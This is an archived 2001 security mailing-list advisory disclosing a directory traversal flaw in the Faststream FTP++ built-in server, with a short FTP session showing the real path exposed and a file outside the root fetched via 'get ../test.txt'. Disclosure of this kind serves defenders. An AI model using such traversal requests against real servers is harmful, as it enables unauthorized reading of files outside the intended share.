-----Original Message-----
From: se00020LION.CC
Subject: Faststream FTP++ Client 2 Beta 11 (build in server)
Vulnerability

Faststram FTP built in server responds with the real
path of directory
instead of a virtual one.It is possible to get files
outside of root.dir.

e:\crap was used as root directory

1. directory path

230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.

2. getting files from outside of root

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33
movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29
bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden
438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

Solution:
no quick fix possible.Use with care.

Author has been contacted on 04.Mar.2001

se00020fhs-hagenberg.ac.at
se00020lion.cc

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]